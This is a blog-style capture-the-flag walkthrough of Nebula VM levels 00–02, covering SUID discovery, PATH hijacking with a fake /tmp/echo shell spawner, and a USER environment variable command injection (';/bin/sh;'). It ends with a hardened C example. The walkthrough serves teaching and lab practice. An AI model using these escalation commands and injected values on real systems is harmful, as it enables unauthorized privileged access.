Day 29: Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.

Atumcell Labs
2 min readJan 28, 2019

To follow along, get the Nebula VM from Exploit Education…

Level 00 (Set User ID)

Finding the files and ignoring errors…

find / -perm /4000 2>/dev/null

A lot of these are common Linux files that are Set User ID, so over time you get to know them and ignore them, unless you're in a CTF that is trolling you and the issue is in a common binary. So always check anyway if you're at a dead end, or if it's an old version that has known vulnerabilities.

Of course “/bin/.../flag00” is seriously suspect, so we try this…

level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

It really was that easy, but do not underestimate the power of Set User ID; it has allowed me to priv. esc. more times than I can recall. It's powerful, it's common, use it! Always check permissions!

Search for SUID/SGID binaries

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Level 01 (Environment Variable Injection — PATH)

The challenge source is provided; can we spot the vulnerability?

We know we can alter environment variables, and that the program will do the following:

setresuid(), which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process, and setresgid(), which sets the real GID, the effective GID, and the saved set-group-ID of the calling process.

With the source code, and access to the server, it’s easy to spot the issue:

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

If we can change our executable search $PATH so that it checks /tmp first (a place we know we can write to), then we can put our own ‘echo’ binary there, which lets us run a process as flag01 when the program calls echo through the system. Our echo program will simply spawn a new shell.

nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag

Level 02 (Environment Variable Injection — USER)

We get the source again for this one.

This one is easy, we can just inject a command into the USER environment variable.

cd /home/flag02
USER=";/bin/sh;"
./flag02
getflag

The two semicolons around /bin/sh in the command injection are important: the shell needs them to separate the commands; otherwise it will look for “echo /bin/sh is cool”, which of course is junk for us.
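As an added example (my code, not from the post or from Nebula), here is how the echo call behind levels 01 and 02 could have been written so that neither the PATH trick nor the USER injection works: the binary drops back to the real user, runs /bin/echo by absolute path with a fixed environment, and passes USER as a single argv element instead of through a shell. ECHO_PATH, drop_privileges, build_argv and run_greeting are names I chose for this illustration.

```c
#define _GNU_SOURCE                 /* setresuid/setresgid on glibc */
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

#define ECHO_PATH "/bin/echo"       /* absolute path: no PATH lookup, so /tmp/echo is never found */

/* Give the privilege back before running anything external: the real uid/gid go into
 * all three ids, the opposite of what the Nebula levels do with setresuid(). */
static int drop_privileges(void)
{
    gid_t rgid = getgid(); uid_t ruid = getuid();
    if (setresgid(rgid, rgid, rgid) != 0) return -1;
    if (setresuid(ruid, ruid, ruid) != 0) return -1;
    return 0;
}

/* Build argv for "/bin/echo <user> is cool" without ever going through a shell.
 * USER becomes one argv element, so ';' inside it is plain text. Returns argc. */
static int build_argv(const char *user, char *argv[], size_t max)
{
    if (user == NULL || max < 5) return -1;
    argv[0] = ECHO_PATH; argv[1] = (char *)user;
    argv[2] = "is"; argv[3] = "cool"; argv[4] = NULL;
    return 4;
}

/* fork/execve with a fixed environment; the caller's PATH is discarded.
 * Returns the child's exit status, or -1 on failure. */
static int run_greeting(const char *user)
{
    char *argv[5];
    char *envp[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    if (build_argv(user, argv, 5) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(ECHO_PATH, argv, envp); _exit(127); }  /* 127: exec failed */
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    if (drop_privileges() != 0) return 1;
    const char *user = getenv("USER");
    return run_greeting(user ? user : "nobody") == 0 ? 0 : 1;
}
```

Run with USER=";/bin/sh;" and the output is the literal line “;/bin/sh; is cool”; no shell is ever started.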


Written by Atumcell Labs

Security Research Team @ Atumcell
